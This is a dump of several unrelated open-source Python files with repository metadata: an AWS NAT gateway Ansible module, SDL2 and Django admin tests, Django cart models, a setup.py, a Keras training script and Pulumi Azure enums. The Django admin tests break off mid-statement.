check_mode = module.check_mode
subnet_id = module.params.get('subnet_id')
allocation_id = module.params.get('allocation_id')
eip_address = module.params.get('eip_address')
nat_gateway_id = module.params.get('nat_gateway_id')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
release_eip = module.params.get('release_eip')
client_token = module.params.get('client_token')
if_exist_do_not_create = module.params.get('if_exist_do_not_create')
try:
region, ec2_url, aws_connect_kwargs = (
get_aws_connection_info(module, boto3=True)
)
client = (
boto3_conn(
module, conn_type='client', resource='ec2',
region=region, endpoint=ec2_url, **aws_connect_kwargs
)
)
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Boto3 Client Error - " + str(e.msg))
changed = False
err_msg = ''
if state == 'present':
success, changed, err_msg, results = (
pre_create(
client, subnet_id, allocation_id, eip_address,
if_exist_do_not_create, wait, wait_timeout,
client_token, check_mode=check_mode
)
)
else:
success, changed, err_msg, results = (
remove(
client, nat_gateway_id, wait, wait_timeout, release_eip,
check_mode=check_mode
)
)
if not success:
module.fail_json(
msg=err_msg, success=success, changed=changed
)
else:
module.exit_json(
msg=err_msg, success=success, changed=changed, **results
)
if __name__ == '__main__':
main()
| 32.087805
| 125
| 0.561204
|
ec06965a1e5120c2ae6bf614761527fb8942092d
| 3,015
|
py
|
Python
|
python/masa/lib/python3.4/site-packages/sdl2/test/sdl2ext_draw_test.py
|
tekktonic/programming
|
139959ab9934912d4c531e5ee8b1f39094a6823c
|
[
"0BSD"
] | 3
|
2016-07-16T12:19:43.000Z
|
2021-04-22T19:25:53.000Z
|
sdl2/test/sdl2ext_draw_test.py
|
GreatFruitOmsk/py-sdl2
|
8d1465b6238ab33c14ce0dc473529e7b38650062
|
[
"DOC"
] | null | null | null |
sdl2/test/sdl2ext_draw_test.py
|
GreatFruitOmsk/py-sdl2
|
8d1465b6238ab33c14ce0dc473529e7b38650062
|
[
"DOC"
] | 3
|
2018-09-13T09:08:02.000Z
|
2021-04-07T18:44:32.000Z
|
import sys
import unittest
from ..ext.color import Color, COLOR
from .. import ext as sdl2ext
class SDL2ExtDrawTest(unittest.TestCase):
__tags__ = ["sdl", "sdl2ext"]
def setUp(self):
sdl2ext.init()
def tearDown(self):
sdl2ext.quit()
@unittest.skipIf(hasattr(sys, "pypy_version_info"),
"PyPy's ctypes can't do byref(value, offset)")
@unittest.skipIf(sys.platform=="cli", "IronPython can't cast correctly")
def test_fill(self):
# TODO: add exceptions and more bounding tests.
rects = ((0, 0, 3, 2),
(2, 3, 4, 2),
(5, -1, 2, 2),
(1, 7, 4, 8)
)
factory = sdl2ext.SpriteFactory(sdl2ext.SOFTWARE)
sprite = factory.create_sprite(size=(10, 10), bpp=32)
view = sdl2ext.PixelView(sprite)
for rect in rects:
sdl2ext.fill(sprite, 0)
colorval = sdl2ext.prepare_color(0xAABBCCDD, sprite)
sdl2ext.fill(sprite, 0xAABBCCDD, rect)
for y, row in enumerate(view):
for x, col in enumerate(row):
if y >= rect[1] and y < (rect[1] + rect[3]):
if x >= rect[0] and x < (rect[0] + rect[2]):
self.assertEqual(col, colorval,
"color mismatch at (x, y)")
else:
self.assertEqual(col, 0,
"color mismatch at (x, y)")
else:
self.assertEqual(col, 0, "color mismatch at (x, y)")
@unittest.skipIf(sys.platform=="cli",
"IronPython does not convert int values correctly")
def test_prepare_color(self):
rcolors = (Color(0, 0, 0, 0),
Color(255, 255, 255, 255),
Color(8, 55, 110, 220),
)
icolors = (0x00000000,
0xFFFFFFFF,
0xAABBCCDD,
)
scolors = ("#000",
"#FFF",
"#AABBCCDD",
)
factory = sdl2ext.SpriteFactory(sdl2ext.SOFTWARE)
sprite = factory.create_sprite(size=(10, 10), bpp=32,
masks=(0xFF000000,
0x00FF0000,
0x0000FF00,
0x000000FF))
for color in rcolors:
c = sdl2ext.prepare_color(color, sprite)
self.assertEqual(c, int(color))
for color in icolors:
c = sdl2ext.prepare_color(color, sprite)
cc = COLOR(color)
self.assertEqual(c, int(cc))
for color in scolors:
c = sdl2ext.prepare_color(color, sprite)
cc = COLOR(color)
self.assertEqual(c, int(cc))
if __name__ == '__main__':
sys.exit(unittest.main())
| 35.892857
| 76
| 0.46534
|
56194e6f60448bed155e64eb651dc3dd3fcd5000
| 2,416
|
py
|
Python
|
cart/models.py
|
lautarianoo/django_shop
|
9bc575df8b7af5452bd15cc3cf4fb375be6384bd
|
[
"MIT"
] | null | null | null |
cart/models.py
|
lautarianoo/django_shop
|
9bc575df8b7af5452bd15cc3cf4fb375be6384bd
|
[
"MIT"
] | null | null | null |
cart/models.py
|
lautarianoo/django_shop
|
9bc575df8b7af5452bd15cc3cf4fb375be6384bd
|
[
"MIT"
] | null | null | null |
from django.db import models
from product.models import Product
from django.core import checks
from customer.models import Customer
class CartItem(models.Model):
product = models.OneToOneField(
Product,
on_delete=models.CASCADE,
blank=True,
related_name='items',
)
quantity = models.IntegerField("Количество", default=1)
date_add = models.DateTimeField(auto_now_add=True)
total_price = models.IntegerField("Окончательная цена", default=0)
class Meta:
verbose_name = "Объект корзины"
verbose_name_plural = "Объекты корзины"
def save(self, *args, **kwargs):
for price in range(self.quantity):
self.total_price += self.product.price
super().save(*args, **kwargs)
def __str__(self):
return f"Объект корзины | {self.product.title}"
@classmethod
def check(cls, **kwargs):
errors = super().check(**kwargs)
allowed_types = ['IntegerField', 'SmallIntegerField', 'PositiveIntegerField',
'PositiveSmallIntegerField', 'DecimalField', 'FloatField']
for field in cls._meta.fields:
if field.attname == 'quantity':
if field.get_internal_type() not in allowed_types:
msg = "Class `{}.quantity` must be of one of the types: {}."
errors.append(checks.Error(msg.format(cls.__name__, allowed_types)))
break
else:
msg = "Class `{}` must implement a field named `quantity`."
errors.append(checks.Error(msg.format(cls.__name__)))
return errors
class Cart(models.Model):
customer = models.OneToOneField(
Customer,
on_delete=models.CASCADE,
blank=True,
related_name='cart'
)
cart_items = models.ManyToManyField(
CartItem,
blank=True,
related_name='cart'
)
total_price = models.IntegerField("Тотал прайс корзины", default=0)
date_create = models.DateTimeField(auto_now_add=True)
class Meta:
verbose_name = 'Корзина'
verbose_name_plural = 'Корзины'
def __str__(self):
return f"Корзина {self.customer.user.email}"
def save(self, *args, **kwargs):
price = 0
for item in self.cart_items.all():
price+=item.total_price
self.total_price = price
return super().save(*args, **kwargs)
| 32.648649
| 88
| 0.622517
|
fd30fca01f409dfa24f44f7843e51312648c2b13
| 1,894
|
py
|
Python
|
setup.py
|
psteinb/VoidSeg
|
6e091656f6d777452b0e36644e9eb4a6818792d2
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
psteinb/VoidSeg
|
6e091656f6d777452b0e36644e9eb4a6818792d2
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
psteinb/VoidSeg
|
6e091656f6d777452b0e36644e9eb4a6818792d2
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
from setuptools import setup, find_packages
from os import path
_dir = path.abspath(path.dirname(__file__))
with open(path.join(_dir,'voidseg','version.py')) as f:
exec(f.read())
with open(path.join(_dir,'README.md')) as f:
long_description = f.read()
setup(name='voidseg',
version=__version__,
description='VoidSeg is an implementation of 3 class U-Net and StarDist segmentation networks using self-supervised '
'Noise2Void denosing for segmentation with limited training data.'
'This implementation extends CARE and uses Noise2Void and StarDist.',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/juglab/VoidSeg/',
author='Mangal Prakash, Tim-Oliver Buchholz, Manan Lalit, Florian Jug, Alexander Krull',
author_email='prakash@mpi-cbg.de, tibuch@mpi-cbg.de, lalit@mpi-cbg.de, jug@mpi-cbg.de, krull@mpi-cbg.de',
license='BSD 3-Clause License',
packages=find_packages(),
project_urls={
'Repository': 'https://github.com/juglab/VoidSeg/',
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
install_requires=[
"n2v",
"stardist",
"numpy",
"scipy",
"matplotlib",
"six",
"keras>=2.2.4,<2.3.0",
"tifffile",
"tqdm",
"pathlib2;python_version<'3'",
"backports.tempfile;python_version<'3.4'",
"csbdeep>=0.4.0,<0.5.0"
]
)
| 33.22807
| 123
| 0.609293
|
b980cb61d083ff368279a229451f13d55386f0b1
| 5,684
|
py
|
Python
|
examples/pwr_run/checkpointing/jobs_max_par/job8.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/jobs_max_par/job8.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/jobs_max_par/job8.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
"""
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.mobilenet_v2 import MobileNetV2
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.set_defaults(resume=False)
args = parser.parse_args()
# Training parameters
batch_size = 256
args_lr = 0.002
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_max_param/' + job_name + '*'
total_epochs = 7
starting_epoch = 0
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
model = keras.models.load_model(save_file)
else:
print('train from start')
model = models.Sequential()
base_model = MobileNetV2(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
model.add(base_model)
model.add(layers.Flatten())
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(128, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(64, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_max_param/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
trainable_count = int(np.sum([K.count_params(p) for p in set(model.trainable_weights)]))
param_dict = {}
modify = False
with open('param.json', 'r') as fp:
param_dict = json.load(fp)
if job_name not in param_dict:
param_dict[job_name] = trainable_count
modify = True
elif param_dict[job_name] != trainable_count:
param_dict[job_name] = trainable_count
modify = True
if modify:
with open('param.json', 'w') as fp:
json.dump(param_dict, fp)
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=total_epochs,
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch
#verbose=0
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
finish_dict = {}
with open('finish.json', 'r') as fp:
finish_dict = json.load(fp)
finish_dict[job_name] = 1
with open('finish.json', 'w') as fp:
json.dump(finish_dict, fp)
| 29.915789
| 118
| 0.703202
|
11e75c1655ee37ec4ce251e89bcb7784ac79cc0f
| 4,046
|
py
|
Python
|
sdk/python/pulumi_azure_native/streamanalytics/v20200301/_enums.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/streamanalytics/v20200301/_enums.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/streamanalytics/v20200301/_enums.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'AuthenticationMode',
'CompatibilityLevel',
'CompressionType',
'ContentStoragePolicy',
'Encoding',
'EventSerializationType',
'EventsOutOfOrderPolicy',
'JobType',
'JsonOutputSerializationFormat',
'OutputErrorPolicy',
'OutputStartMode',
'RefreshType',
'SkuName',
]
class AuthenticationMode(str, Enum):
"""
Authentication Mode.
"""
MSI = "Msi"
USER_TOKEN = "UserToken"
CONNECTION_STRING = "ConnectionString"
class CompatibilityLevel(str, Enum):
"""
Controls certain runtime behaviors of the streaming job.
"""
COMPATIBILITY_LEVEL_1_0 = "1.0"
COMPATIBILITY_LEVEL_1_2 = "1.2"
class CompressionType(str, Enum):
"""
Indicates the type of compression that the input uses. Required on PUT (CreateOrReplace) requests.
"""
NONE = "None"
G_ZIP = "GZip"
DEFLATE = "Deflate"
class ContentStoragePolicy(str, Enum):
"""
Valid values are JobStorageAccount and SystemAccount. If set to JobStorageAccount, this requires the user to also specify jobStorageAccount property. .
"""
SYSTEM_ACCOUNT = "SystemAccount"
JOB_STORAGE_ACCOUNT = "JobStorageAccount"
class Encoding(str, Enum):
"""
Specifies the encoding of the incoming data in the case of input and the encoding of outgoing data in the case of output. Required on PUT (CreateOrReplace) requests.
"""
UTF8 = "UTF8"
class EventSerializationType(str, Enum):
"""
Indicates the type of serialization that the input or output uses. Required on PUT (CreateOrReplace) requests.
"""
CSV = "Csv"
AVRO = "Avro"
JSON = "Json"
PARQUET = "Parquet"
class EventsOutOfOrderPolicy(str, Enum):
"""
Indicates the policy to apply to events that arrive out of order in the input event stream.
"""
ADJUST = "Adjust"
DROP = "Drop"
class JobType(str, Enum):
"""
Describes the type of the job. Valid modes are `Cloud` and 'Edge'.
"""
CLOUD = "Cloud"
EDGE = "Edge"
class JsonOutputSerializationFormat(str, Enum):
"""
This property only applies to JSON serialization of outputs only. It is not applicable to inputs. This property specifies the format of the JSON the output will be written in. The currently supported values are 'lineSeparated' indicating the output will be formatted by having each JSON object separated by a new line and 'array' indicating the output will be formatted as an array of JSON objects. Default value is 'lineSeparated' if left null.
"""
LINE_SEPARATED = "LineSeparated"
ARRAY = "Array"
class OutputErrorPolicy(str, Enum):
"""
Indicates the policy to apply to events that arrive at the output and cannot be written to the external storage due to being malformed (missing column values, column values of wrong type or size).
"""
STOP = "Stop"
DROP = "Drop"
class OutputStartMode(str, Enum):
"""
This property should only be utilized when it is desired that the job be started immediately upon creation. Value may be JobStartTime, CustomTime, or LastOutputEventTime to indicate whether the starting point of the output event stream should start whenever the job is started, start at a custom user time stamp specified via the outputStartTime property, or start from the last event output time.
"""
JOB_START_TIME = "JobStartTime"
CUSTOM_TIME = "CustomTime"
LAST_OUTPUT_EVENT_TIME = "LastOutputEventTime"
class RefreshType(str, Enum):
"""
Indicates the type of data refresh option.
"""
STATIC = "Static"
REFRESH_PERIODICALLY_WITH_FULL = "RefreshPeriodicallyWithFull"
REFRESH_PERIODICALLY_WITH_DELTA = "RefreshPeriodicallyWithDelta"
class SkuName(str, Enum):
"""
The name of the SKU. Required on PUT (CreateOrReplace) requests.
"""
STANDARD = "Standard"
| 31.123077
| 449
| 0.702422
|
ec8018e8afa9e80685f0829b3c1bdb2e01a2511a
| 36,990
|
py
|
Python
|
tests/admin_changelist/tests.py
|
TomasM/django
|
1fc28b7aef76115fcd6e3931f0c0dda175297d3f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/admin_changelist/tests.py
|
TomasM/django
|
1fc28b7aef76115fcd6e3931f0c0dda175297d3f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/admin_changelist/tests.py
|
TomasM/django
|
1fc28b7aef76115fcd6e3931f0c0dda175297d3f
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import unicode_literals
import datetime
from django.contrib import admin
from django.contrib.admin.models import LogEntry
from django.contrib.admin.options import IncorrectLookupParameters
from django.contrib.admin.templatetags.admin_list import pagination
from django.contrib.admin.tests import AdminSeleniumWebDriverTestCase
from django.contrib.admin.views.main import ALL_VAR, SEARCH_VAR, ChangeList
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse
from django.template import Context, Template
from django.test import TestCase, override_settings
from django.test.client import RequestFactory
from django.utils import formats, six
from .admin import (
BandAdmin, ChildAdmin, ChordsBandAdmin, ConcertAdmin,
CustomPaginationAdmin, CustomPaginator, DynamicListDisplayChildAdmin,
DynamicListDisplayLinksChildAdmin, DynamicListFilterChildAdmin,
DynamicSearchFieldsChildAdmin, FilteredChildAdmin, GroupAdmin,
InvitationAdmin, NoListDisplayLinksParentAdmin, ParentAdmin, QuartetAdmin,
SwallowAdmin, site as custom_site,
)
from .models import (
Band, Child, ChordsBand, ChordsMusician, Concert, CustomIdUser, Event,
Genre, Group, Invitation, Membership, Musician, OrderedObject, Parent,
Quartet, Swallow, UnorderedObject,
)
@override_settings(ROOT_URLCONF="admin_changelist.urls")
class ChangeListTests(TestCase):
def setUp(self):
self.factory = RequestFactory()
def _create_superuser(self, username):
return User.objects.create(username=username, is_superuser=True)
def _mocked_authenticated_request(self, url, user):
request = self.factory.get(url)
request.user = user
return request
def test_select_related_preserved(self):
"""
Regression test for #10348: ChangeList.get_queryset() shouldn't
overwrite a custom select_related provided by ModelAdmin.get_queryset().
"""
m = ChildAdmin(Child, admin.site)
request = self.factory.get('/child/')
list_select_related = m.get_list_select_related(request)
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
self.assertEqual(cl.queryset.query.select_related, {
'parent': {'name': {}}
})
def test_select_related_as_tuple(self):
ia = InvitationAdmin(Invitation, admin.site)
request = self.factory.get('/invitation/')
list_select_related = ia.get_list_select_related(request)
cl = ChangeList(request, Child, ia.list_display, ia.list_display_links,
ia.list_filter, ia.date_hierarchy, ia.search_fields,
list_select_related, ia.list_per_page,
ia.list_max_show_all, ia.list_editable, ia)
self.assertEqual(cl.queryset.query.select_related, {'player': {}})
def test_select_related_as_empty_tuple(self):
ia = InvitationAdmin(Invitation, admin.site)
ia.list_select_related = ()
request = self.factory.get('/invitation/')
list_select_related = ia.get_list_select_related(request)
cl = ChangeList(request, Child, ia.list_display, ia.list_display_links,
ia.list_filter, ia.date_hierarchy, ia.search_fields,
list_select_related, ia.list_per_page,
ia.list_max_show_all, ia.list_editable, ia)
self.assertEqual(cl.queryset.query.select_related, False)
def test_get_select_related_custom_method(self):
class GetListSelectRelatedAdmin(admin.ModelAdmin):
list_display = ('band', 'player')
def get_list_select_related(self, request):
return ('band', 'player')
ia = GetListSelectRelatedAdmin(Invitation, admin.site)
request = self.factory.get('/invitation/')
list_select_related = ia.get_list_select_related(request)
cl = ChangeList(request, Child, ia.list_display, ia.list_display_links,
ia.list_filter, ia.date_hierarchy, ia.search_fields,
list_select_related, ia.list_per_page,
ia.list_max_show_all, ia.list_editable, ia)
self.assertEqual(cl.queryset.query.select_related, {'player': {}, 'band': {}})
def test_result_list_empty_changelist_value(self):
"""
Regression test for #14982: EMPTY_CHANGELIST_VALUE should be honored
for relationship fields
"""
new_child = Child.objects.create(name='name', parent=None)
request = self.factory.get('/child/')
m = ChildAdmin(Child, admin.site)
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
cl = ChangeList(request, Child, list_display, list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all, m.list_editable, m)
cl.formset = None
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
link = reverse('admin:admin_changelist_child_change', args=(new_child.id,))
row_html = '<tbody><tr class="row1"><th class="field-name"><a href="%s">name</a></th><td class="field-parent nowrap">-</td></tr></tbody>' % link
self.assertNotEqual(table_output.find(row_html), -1,
'Failed to find expected row element: %s' % table_output)
def test_result_list_html(self):
"""
Verifies that inclusion tag result_list generates a table when with
default ModelAdmin settings.
"""
new_parent = Parent.objects.create(name='parent')
new_child = Child.objects.create(name='name', parent=new_parent)
request = self.factory.get('/child/')
m = ChildAdmin(Child, admin.site)
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
cl = ChangeList(request, Child, list_display, list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all, m.list_editable, m)
cl.formset = None
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
link = reverse('admin:admin_changelist_child_change', args=(new_child.id,))
row_html = '<tbody><tr class="row1"><th class="field-name"><a href="%s">name</a></th><td class="field-parent nowrap">Parent object</td></tr></tbody>' % link
self.assertNotEqual(table_output.find(row_html), -1,
'Failed to find expected row element: %s' % table_output)
def test_result_list_editable_html(self):
"""
Regression tests for #11791: Inclusion tag result_list generates a
table and this checks that the items are nested within the table
element tags.
Also a regression test for #13599, verifies that hidden fields
when list_editable is enabled are rendered in a div outside the
table.
"""
new_parent = Parent.objects.create(name='parent')
new_child = Child.objects.create(name='name', parent=new_parent)
request = self.factory.get('/child/')
m = ChildAdmin(Child, admin.site)
# Test with list_editable fields
m.list_display = ['id', 'name', 'parent']
m.list_display_links = ['id']
m.list_editable = ['name']
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all, m.list_editable, m)
FormSet = m.get_changelist_formset(request)
cl.formset = FormSet(queryset=cl.result_list)
template = Template('{% load admin_list %}{% spaceless %}{% result_list cl %}{% endspaceless %}')
context = Context({'cl': cl})
table_output = template.render(context)
# make sure that hidden fields are in the correct place
hiddenfields_div = '<div class="hiddenfields"><input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" /></div>' % new_child.id
self.assertInHTML(hiddenfields_div, table_output, msg_prefix='Failed to find hidden fields')
# make sure that list editable fields are rendered in divs correctly
editable_name_field = '<input name="form-0-name" value="name" class="vTextField" maxlength="30" type="text" id="id_form-0-name" />'
self.assertInHTML('<td class="field-name">%s</td>' % editable_name_field, table_output, msg_prefix='Failed to find "name" list_editable field')
def test_result_list_editable(self):
"""
Regression test for #14312: list_editable with pagination
"""
new_parent = Parent.objects.create(name='parent')
for i in range(200):
Child.objects.create(name='name %s' % i, parent=new_parent)
request = self.factory.get('/child/', data={'p': -1}) # Anything outside range
m = ChildAdmin(Child, admin.site)
# Test with list_editable fields
m.list_display = ['id', 'name', 'parent']
m.list_display_links = ['id']
m.list_editable = ['name']
self.assertRaises(IncorrectLookupParameters, lambda:
ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all, m.list_editable, m))
def test_custom_paginator(self):
new_parent = Parent.objects.create(name='parent')
for i in range(200):
Child.objects.create(name='name %s' % i, parent=new_parent)
request = self.factory.get('/child/')
m = CustomPaginationAdmin(Child, admin.site)
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
self.assertIsInstance(cl.paginator, CustomPaginator)
def test_distinct_for_m2m_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. Basic ManyToMany.
"""
blues = Genre.objects.create(name='Blues')
band = Band.objects.create(name='B.B. King Review', nr_of_members=11)
band.genres.add(blues)
band.genres.add(blues)
m = BandAdmin(Band, admin.site)
request = self.factory.get('/band/', data={'genres': blues.pk})
cl = ChangeList(request, Band, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
# There's only one Group instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_through_m2m_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. With an intermediate model.
"""
lead = Musician.objects.create(name='Vox')
band = Group.objects.create(name='The Hype')
Membership.objects.create(group=band, music=lead, role='lead voice')
Membership.objects.create(group=band, music=lead, role='bass player')
m = GroupAdmin(Group, admin.site)
request = self.factory.get('/group/', data={'members': lead.pk})
cl = ChangeList(request, Group, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
# There's only one Group instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_through_m2m_at_second_level_in_list_filter(self):
"""
When using a ManyToMany in list_filter at the second level behind a
ForeignKey, distinct() must be called and results shouldn't appear more
than once.
"""
lead = Musician.objects.create(name='Vox')
band = Group.objects.create(name='The Hype')
Concert.objects.create(name='Woodstock', group=band)
Membership.objects.create(group=band, music=lead, role='lead voice')
Membership.objects.create(group=band, music=lead, role='bass player')
m = ConcertAdmin(Concert, admin.site)
request = self.factory.get('/concert/', data={'group__members': lead.pk})
cl = ChangeList(request, Concert, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
# There's only one Concert instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_inherited_m2m_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. Model managed in the
admin inherits from the one that defins the relationship.
"""
lead = Musician.objects.create(name='John')
four = Quartet.objects.create(name='The Beatles')
Membership.objects.create(group=four, music=lead, role='lead voice')
Membership.objects.create(group=four, music=lead, role='guitar player')
m = QuartetAdmin(Quartet, admin.site)
request = self.factory.get('/quartet/', data={'members': lead.pk})
cl = ChangeList(request, Quartet, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
# There's only one Quartet instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_m2m_to_inherited_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. Target of the relationship
inherits from another.
"""
lead = ChordsMusician.objects.create(name='Player A')
three = ChordsBand.objects.create(name='The Chords Trio')
Invitation.objects.create(band=three, player=lead, instrument='guitar')
Invitation.objects.create(band=three, player=lead, instrument='bass')
m = ChordsBandAdmin(ChordsBand, admin.site)
request = self.factory.get('/chordsband/', data={'members': lead.pk})
cl = ChangeList(request, ChordsBand, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
# There's only one ChordsBand instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_non_unique_related_object_in_list_filter(self):
"""
Regressions tests for #15819: If a field listed in list_filters
is a non-unique related object, distinct() must be called.
"""
parent = Parent.objects.create(name='Mary')
# Two children with the same name
Child.objects.create(parent=parent, name='Daniel')
Child.objects.create(parent=parent, name='Daniel')
m = ParentAdmin(Parent, admin.site)
request = self.factory.get('/parent/', data={'child__name': 'Daniel'})
cl = ChangeList(request, Parent, m.list_display, m.list_display_links,
